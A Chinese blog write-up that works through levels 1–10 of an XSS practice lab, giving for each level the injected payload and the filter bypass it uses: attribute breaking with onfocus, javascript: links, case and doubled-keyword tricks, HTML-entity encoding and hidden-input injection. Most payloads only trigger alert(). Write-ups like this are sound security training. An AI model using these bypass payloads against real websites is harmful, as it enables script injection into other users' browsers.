我的XSS挑战之旅

最新推荐文章于 2023-03-16 22:25:08 发布
最新推荐文章于 2023-03-16 22:25:08 发布
阅读量574 收藏 1
点赞数
分类专栏: XSS 漏洞 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46150940/article/details/107881776
版权
漏洞 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
XSS
2 篇文章 0 订阅
订阅专栏

目录

在这里插入图片描述

Level-1

在这里插入图片描述

发现参数name的内容是一个注入点,并且没有任何过滤

Payload: ?name=test<script>alert('xss')</script>

在这里插入图片描述

Level-2

在这里插入图片描述

和第一关差不多,输入

 <script>alert('xss')</script>

没有出现弹窗
在这里插入图片描述
查看一下源代码
在这里插入图片描述
直接用双引号闭合value,输入

 "><script>alert('xss')</script>

在这里插入图片描述

Level-3

在这里插入图片描述
查看源码,value为单引号闭合
在这里插入图片描述
输入

<script>alert('xss')</script>

查看源代码,输入点在value属性里面
在这里插入图片描述
发现<>被转义了成了&gt和&lt

在搜素框中输入

xss'  οnfοcus=javascript:alert("xss") '

我们用javascript里边的onfocus事件,并且使用'把前面的value给闭合掉。
在这里插入图片描述
在这里插入图片描述
HTML转义常用字符

字符十进制转义字符
"&#34;&quot;
&&#38;&amp;
<&#60;&It;
>&#62;&gt
不断开空格(non-breaking space)&#160;&nbsp;

Level-4

在这里插入图片描述
在搜索框中输入

<script>alert('xss')</script>

查看源码,输入点在value属性里面
在这里插入图片描述

发现过滤了<>,用双引号"把value闭合。

继续在搜素框中输入

xss"  οnfοcus=javascript:alert("xss") "

在这里插入图片描述

方法二:
输入

 "οnfοcus=alert(1)

在这里插入图片描述
闭合了前面的双引号,但是后面多了一个双引号,用//注释掉,输入

"οnfοcus=alert(1)//

在这里插入图片描述

Level-5

在这里插入图片描述

在搜索框中输入

<script>alert('xss')</script>

查看源码
在这里插入图片描述
发现script被转义为scr_ipt,使用超链接绕过,在搜素框中输入

"><a href="javascript:alert('xss')">test</a>

在这里插入图片描述
然后点击test

在这里插入图片描述

Level-6

在这里插入图片描述

在搜索框中输入

<script>alert('xss')</script>

查看源码,和第5关一样,script被转义为scr_ipt

在这里插入图片描述
使用超链接绕过,发现不行

"><a href="javascript:alert('xss')">test</a>

在这里插入图片描述
查看源码,href被转义成了hr_ef
在这里插入图片描述
百度了一下,还能使用大小写进行绕过,将href写成HREF

"><a HREF="javascript:alert('xss')">test</a>

在这里插入图片描述
再点击test
在这里插入图片描述

Level-7

在这里插入图片描述

在搜索框中输入,查看源码,发现script被过滤

<script>alert('xss')</script>

在这里插入图片描述
使用超链接绕过,不行

"><a href="javascript:alert('xss')">test</a>

在这里插入图片描述

大小写进行绕过,将href写成HREF,还是不行

"><a HREF="javascript:alert('xss')">test</a>

再使用双写进行绕过,双写href和javascript

"><a hrhrefef="javasscriptcript:alert('xss')">test</a>

在这里插入图片描述

成功

在这里插入图片描述

Level-8

在这里插入图片描述

在输入框中输入

javascript:alert('xss')

发现javascript被加上了下划线,变成了javascr_ipt
在这里插入图片描述

用Html实体编码绕过

HTML实体编码指的就是用unicode编码来代替关键字符或关键符号,&、#、;不能被过滤。

将javascript的script进行实体编码,unicode编码后的结果为java&#115;&#99;&#114;&#105;&#112;&#116;

输入

 java&#115;&#99;&#114;&#105;&#112;&#116;:alert('xss')

点击友情链接
在这里插入图片描述

成功
在这里插入图片描述

Level-9

在这里插入图片描述

还是script被过滤,直接用上一关的payload

java&#115;&#99;&#114;&#105;&#112;&#116;:alert('xss')

提示连接不合法,要有http://关键字
在这里插入图片描述
添加的url有验证合法性,没有带http://则不合法,
方法一:
http://放在alert里面

java&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://www.baidu.com')

方法二:
http://放在注释//后面

java&#115;&#99;&#114;&#105;&#112;&#116;:alert('xss')//http://www.baidu.com

点击友情链接,成功
在这里插入图片描述

Level-10

到了第10关页面页面,没有输入框了
在这里插入图片描述
构造payload

Payload:?keyword=javascript:alert('xss')

查看源码发现了几个input标签
在这里插入图片描述

不知道怎么办了,看了下大师傅们的wp,构造payload

Payload: ?keyword=&t_link=" type="text" 1&t_history=" type="text" 2&t_sort =" type="text" 3

payload后,还是没有变化
在这里插入图片描述

这是大师傅们payload后的代码

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value=""text"" type="hidden">

t_sort是注入点,直接注入

Payload: ?keyword = test&t_sort="type="text" onclick = "alert("xss")

在这里插入图片描述
一脸茫然,还是不知道怎么回事

Atkxor
关注
专栏目录
XSS挑战之旅[全20关]上
ldkpolite007的博客
05-06 2599
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
XSS挑战之旅练习1-13
m0_53223419的博客
03-16 285
使用docker搭建靶场。
XSS挑战之旅
weixin_41182861的博客
09-26 2037
level-1 在“name=”后面写什么,网页就显示什么。 *查看源码,发现写入的数据在<>标签的外面,那么name的值直接换成JS: <script>alert(1)</script> <svg/onload=alert(1)> <script>confirm(1)</script> <script>prompt(1)</script> level-2 此处为搜索型的xss,分析代码,使用的是get
xss挑战之旅
最新发布
m0_71326960的博客
03-16 321
使用docker搭建xss挑战之旅运行环境,xss挑战之旅level1-level3
1.xss之旅—Level1
qwsn
03-13 1607
XSS过程: URL栏: ?name=<script>alert(123)</script> ?name=<script>alert('123')</script> ?name=<script>alert("123")</script> ?name=<script>alert(/123/)</script&g...
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1440
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
使用docker搭建xss挑战之旅环境
DXfighting_的博客
04-14 1138
docker search XSS-challenge-tour 搜索镜像 Docker pull 下载镜像 Docker images 查看存在镜像 dockerrun-dt--nameXSS-challenge-tour-p84:80--rmc0ny1/XSS-challenge-tour,运行镜像文件 打开网页,查看是否成功 ...
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 364
好。
XSS挑战之旅(10-18)
老司机开代码的博客
08-31 671
文章目录第十关第十一关第十二关第十三关第十四关第十五关第十六关第十七关第十八关 第十关 构造url提交 level10.php?keyword=<script>alert(1)</script> 首先ctrl+U看一下页面源码: <h1 align=center>欢迎来到level10</h1> <h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
XSS挑战之旅(1-9)
老司机开代码的博客
08-27 1443
文章目录环境搭建第一关第二关第三关第四关第五关第六关第七关第八关第九关 环境搭建 XSSlab的搭建很简单,下载好压缩包,解压到phpstudy的WWW目录下即可访问。 源码下载(t8t7) 如果不想自己搭建的话,网上有很多搭建好的可以直接测试,比如: https://xss.angelo.org.cn 前几关还是比较水的,直接把做题过程记录下来好了。。。 第一关 如图所示,第一关展示的是我们可以通过url中的?name参数,向网站提交数据,然后返回到页面上。 那么直接试一下把name的值提交成弹框。
xss labs 挑战之旅
lemonwei
06-05 787
没事重新从xss的源码分析一下形成和利用 xss挑战之旅进入一关,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及confirm和prompt 查看原码发现对输出没有进行过滤,直接get参数输出 查看原码发现对输出没有进行过滤,直接get参数输出 2. 第二关进入,看到输入发现没回应,查看原码被转义了尝试构造闭合payload 打开源码发现一处被htmlspecialchars($str)转义另一处没有转义 3. 进入
3.xss之旅—Level3
qwsn
03-13 1723
XSS过程: 输入框:<script>alert(/qwsn/)</script> //查看源码,发现:script脚本被写在input标签的value的属性值内,<被&lt替换,>被&gt替换了 <input name=keyword value=' &lt;script&gt;alert(/qwsn/)&lt...
安全学习之XSS——XSS挑战之旅
Jason_TBWH的博客
01-14 927
今天算是假期学习的第一天吧,回顾了一下暑假的学习过程,觉得有必要在xss和sql注入这里重点加强一下,相应的也包括JS,php,sql语言的跟进学习。 学习过程大致是,看书,看视频,练习,总结。 寒假还有好多事要做,每天的学习尽量提高点效率。少睡觉,少打游戏,想想自己的未来。 XSS这块其实内容很多,花样也很多,可浅可深,目前我打算通过靶场练习一下基本功,就当做玩了。 靶场链接:http://xs...
xss挑战之旅11关到13关,操作步骤配截图。
jzzer447的博客
04-15 574
level11 分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。 头部本身没有Referer,自行添加了 payload:Referer:" onmouseover=alert(11) type="text" Referer:" onclick="alert(11)" type="text level12...
xss挑战之旅level1-level4,操作步骤配截图
qq_56424902的博客
03-07 288
xss挑战之旅level1-level4,操作步骤配截图。 查看源代码发现弹窗直接属于语句令其弹窗 (2)提前闭合 (3)与第二题一样value提前闭合 (4)与第二题一样 ...
XSS盗取用户信息实验(详细)及xss之旅闯关
m0re's blog
05-29 1218
本文目录前言小实验实验环境实验实验过程xss之旅 前言 近段时间学习xss,进行了比较详细的了解,也学了一个小实验,感觉挺有意思,记录下来。然后,后面就是xss之旅的闯关。 小实验 实验环境 DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验 实验原理: 克隆网站登录页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储...
xss平台游戏挑战 level1-10
freerats的博客
06-16 625
level-1 发现有个参数name, level1.php?name= 发现给参数传什么,页面就会显示欢迎什么 审查test处源码 发现被<h2>标签包裹 那么闭合标签,再加上弹窗语句即可 payload:name=</h2><script>alert(/xss/)</script> level-2 发现搜索框,跟上题类似,在输入框内输入,就会在上面显示与什么相关的结果。 同样的,进行元素审查 尝试和第一题一样的做法,闭合标签<h2>发现无效
揭示Web安全挑战XSS攻击原理与防范策略
Web安全性测试之XSS(Cross-Site Scripting)是一项至关重要的任务,特别是在现代Web应用中。XSS漏洞是一种常见的Web安全威胁,攻击者通过在网页中嵌入恶意客户端脚本,如JavaScript,利用用户浏览器的执行能力来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Atkxor

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值